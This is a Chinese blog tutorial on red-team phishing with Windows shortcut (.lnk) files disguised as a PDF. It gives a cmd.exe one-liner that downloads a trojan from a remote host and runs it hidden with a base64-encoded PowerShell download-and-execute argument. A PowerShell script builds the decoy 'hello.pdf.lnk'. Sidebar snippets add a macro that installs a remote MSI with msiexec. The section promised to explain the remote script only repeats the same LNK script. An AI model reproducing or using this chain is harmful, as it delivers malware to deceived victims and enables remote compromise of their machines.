红队钓鱼技术之LNK快捷方式

已于 2023-08-07 16:08:53 修改
阅读量1k 收藏 2
点赞数 1
分类专栏: 红队的自我修养 文章标签: 系统安全 windows 网络安全 网络
于 2023-08-07 15:43:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/132147601
版权

简介

lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令


步骤

1.编写shell命令

首先新建一个文本文件test.txt,用于存放要执行的shell命令(其实快捷方式钓鱼的本质就是指向cmd.exe以此来执行shell命令)

test.txt的内容如下所示,其目的是远程下载木马程序至本地存放临时文件的目录,随后附加参数执行木马程序

cmd.exe /c (curl http://192.168.47.155:80/download/mypowershell.exe --output C:\Windows\TEMP\win.exe) & (start /B C:\Windows\TEMP\win.exe SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDcuMTU1OjgwL2InKSk=)

start命令用于启动一个新的窗口来运行指定的程序或命令,而/B选项告诉start 命令在后台(即无窗口)运行。这样做的目的是更加隐蔽地执行木马程序


2.编写ps1脚本生成lnk

创建一个powershell脚本文件createlnk.ps1,代码如下所示,其目的是生成一个lnk快捷方式

"test.txt" 文件中获取内容,并将该内容存储在变量 $file$file = Get-Content "test.txt"

 创建一个 COM 对象,该对象对应于 Windows Script Host Shell,可以用来执行各种系统任务,例如创建快捷方式
$WshShell = New-Object -comObject WScript.Shell

 使用 WSH Shell 的 `CreateShortcut` 方法创建一个快捷方式,该快捷方式的名称是 "test.lnk"
$Shortcut = $WshShell.CreateShortcut("hello.pdf.lnk")

 设置快捷方式的目标路径,也就是快捷方式所指向的程序。这里设置的是 cmd.exe,它是 Windows 的命令提示符
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"

 设置快捷方式的图标位置。这里设置的是 Shell32.dll 文件中的第 1 个图标
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,1"

 设置当启动目标程序时要传递给它的命令行参数。这里设置的是 "test.txt" 文件的内容
$Shortcut.Arguments = ''+ $file

 保存对快捷方式的所有更改,创建了实际的 ".lnk" 文件
$Shortcut.Save()

3.运行测试

使用powershell运行createlnk.ps1后会生成一个lnk文件hello.pdf.lnk

点击lnk文件后,会执行之前编写的shell命令。如下图所示,hello.pdf.ink会被真正的pdf文件替换掉,CS成功上线。

这些功能的实现都归功于远程的powershell脚本,后续我会讲解下此脚本的实现思路

动画

远程下载的木马程序其实就是一个模拟powershell的可执行程序,想了解的可以看我博客免杀系列的文章。

这里我讲解下powershell远程执行脚本的代码,从上述的执行效果图可以发现,点击lnk一段时间后才打开真正的pdf文件,这是因为脚本需要花费一些时间去遍历系统的目录以此来寻找到lnk钓鱼文件的所在路径。后面你还可以添加CS上线的powershell代码,这里我就没添上去了

"test.txt" 文件中获取内容,并将该内容存储在变量 $file$file = Get-Content "test.txt"

 创建一个 COM 对象,该对象对应于 Windows Script Host Shell,可以用来执行各种系统任务,例如创建快捷方式
$WshShell = New-Object -comObject WScript.Shell

 使用 WSH Shell 的 `CreateShortcut` 方法创建一个快捷方式,该快捷方式的名称是 "test.lnk"
$Shortcut = $WshShell.CreateShortcut("hello.pdf.lnk")

 设置快捷方式的目标路径,也就是快捷方式所指向的程序。这里设置的是 cmd.exe,它是 Windows 的命令提示符
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"

 设置快捷方式的图标位置。这里设置的是 Shell32.dll 文件中的第 1 个图标
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,1"

 设置当启动目标程序时要传递给它的命令行参数。这里设置的是 "test.txt" 文件的内容
$Shortcut.Arguments = ''+ $file

 保存对快捷方式的所有更改,创建了实际的 ".lnk" 文件
$Shortcut.Save()

上述脚本代码有关于设置快捷方式的图标位置,图标位置的下标排序是从0开始的。例如下图我所指的这个图标,它的位置下标是1(从上往下数, 随后以此从左往右数)

这里还有一个大坑, 我发现在gui界面更换图标后点击lnk文件无法执行对应的shell命令, 只有使用powershell脚本来更换图标文件才能正常执行

image-20230806170455971

参考链接

  • https://xz.aliyun.com/t/9159#toc-5
Henry404s
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
快捷执行方式_红队攻防之LNK快捷方式钓鱼
weixin_42531710的博客
01-09 2083
点击上方“蓝字”,发现更多精彩。0x00 LNK快捷方式介绍lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。“.lnk”是WINDOWS系统默认bai的快捷方式的扩展名,如果“文件夹选项”下设置为“隐藏已知文件类型的扩展名”,正常情况下“.lnk”是不显示的。0x01 准备工具及流程准备工具:Cobalt Stri...
cobaltstrike--CHM、LNK钓鱼&网站钓鱼
Z_l123的博客
01-22 3766
1.CHM钓鱼 1)制作CHM 创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件 将下列代码复制到文件夹中的index.html中 <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x cla.
红蓝对抗钓鱼篇之从入门到放弃
m0_61869253的博客
07-27 299
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。
使用powershell创建lnk后,lnk打开失败
weixin_35756624的博客
12-28 145
PowerShell 中创建 lnk 文件需要使用 New-Object cmdlet 和 Windows Script Host 的 WshShell 类。 例如,要在桌面上创建一个名为 "MyLink.lnk" 的快捷方式,指向 C:\Windows\System32\Notepad.exe 程序,可以使用以下命令: $WshShell = New-Object -ComObject Ws...
常用的邮件钓鱼伪装方法
m0_61869253的博客
08-10 1039
修改快捷方式中的目标栏内容执行powershell命令下载木马将以下内容写入目标栏中&cmd调用powershell,隐藏窗口执行下载网站的EXE恶意文件,存储到某一文件夹下,命令行运行EXE恶意文件隐藏恶意文件,利用命名及图标伪装的快捷方式诱导点击将真实要执行的恶意文件进行隐藏(此步骤可选)创建快捷方式指向该文件,修改目标内容为explorer.exe .\evil.exe 将起始位置内容删除。
网安科普之瞒天过海之快捷方式钓鱼
xnxqwzy的博客
08-01 89
利用快捷方式网络钓鱼攻击很早就出现了,虽然目前有很多对应的安全防护策略,但是该类型攻击依然是很多APT组织的主力攻击手段(例如:海莲花、响尾蛇等)。未知攻击可能随时出现,社会工程学攻击也将永远伴随人类的技术发展永存,大家需要时刻保持警惕。全防护策略,但是该类型攻击依然是很多APT组织的主力攻击手段(例如:海莲花、响尾蛇等)。未知攻击可能随时出现,社会工程学攻击也将永远伴随人类的技术发展永存,大家需要时刻保持警惕。接下来我将给各位同学划分一张学习计划表!
红队必备技能之隐蔽的技巧1
08-03
5.1 添加仓库 5.2 安装Certbot的Nginx软件包 5.3 验证配置是否正确 5.5 获取证书 5.6 自动续订
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
红队测试之Linux提权小结1
08-03
例如,一个普通用户利用某些漏洞或技巧,将自己升级为管理员用户,或者利用操作系统或软件应用程序中的错误、设计缺陷或配置错误来获得更高级别的访问权限。提权行为通常是攻击者为了深入控制系统而采取的关键步骤。...
实战攻防之红队视角下的防御体系突破.docx
08-23
实战攻防之红队视角下的防御体系突破
对HW 钓鱼简单样本分析以及制作
zkaqlaoniao的博客
03-26 439
显示出来后,看到 rundll32.exe 驱动的就是这个 dll(这个pdf后缀的文件就是将dll文件改成pdf后缀然后用rundll32来进行运行),显然这就是那个可恶的马仔了,立即拿出我的 ida pro 丢进去分析一手。然后打开属性查看快捷方式,看到他运行了一个 rundll32.exe 的文件,应该很多人已经知道这是为了调恶意的 dll,但一看就一个 rundll32.exe 后面全被空格隐藏了后面的命令执行。记录某个对某个钓鱼事件中获取的钓鱼样本进行分析,以及简单的制作学习。
pdf钓鱼文档制作过程
m0_46390077的博客
12-12 150
首先将文件都准备好,首先生成一个木马和一个正常的PDF文件(当然名字越贴近诱惑的文件名越好)模式选择全部隐藏 ,更新模式选择解压并更新文件,覆盖模式选择覆盖所有文件。
取证分析-检查PDF文件、恶意PDF生成器、使用代码生成 pdf 封面、尾页
代码讲故事
03-21 1359
取证分析-检查PDF文件、恶意PDF生成器、使用代码生成 pdf 封面、尾页。在当今的数字环境中,便携式文档格式 (PDF) 文件的广泛使用已成为通信和信息共享不可或缺的一部分。然而,这种便利也带来了潜在的安全挑战,因为 PDF 文件可能隐藏着恶意行为者可能利用的隐藏风险和漏洞。随着对全面网络安全措施的需求不断增长,彻底检查 PDF 文件以识别任何潜在的安全风险并了解其内部结构变得至关重要。这种探索通常涉及使用有助于深入分析的专用工具。
钓鱼-捆绑木马文件
安于心,修于形
08-01 467
钓鱼 红队
网络安全之内外网渗透-网络钓鱼技巧
weixin_46626737的博客
06-30 226
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入宏表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用宏的文件,在通过邮件发。利用生成的宏代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择宏,取名,编辑,在编辑弹出的框中加。
钓鱼篇-利用快捷方式上线CS
weixin_45701675的博客
11-23 2247
利用快捷方式上线CS
StudyStudyStudy第十六天(2024.8.2)
最新发布
tuowenjian的博客
08-02 1078
AOP (Aspect Orient Programming),直译过来就是 面向切面编程,AOP 是一种编程思想,是面向对象编程(OOP)的一种补充。面向切面编程,实现在不修改源代码的情况下给程序动态统一添加额外功能的一种技术
goby红队版poc
08-20
Goby红队版POC是一个专门为红队渗透测试设计的工具。红队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby红队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞。 Goby红队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编写自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby红队版POC是一款功能强大的红队渗透测试工具,能够帮助安全团队发现和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值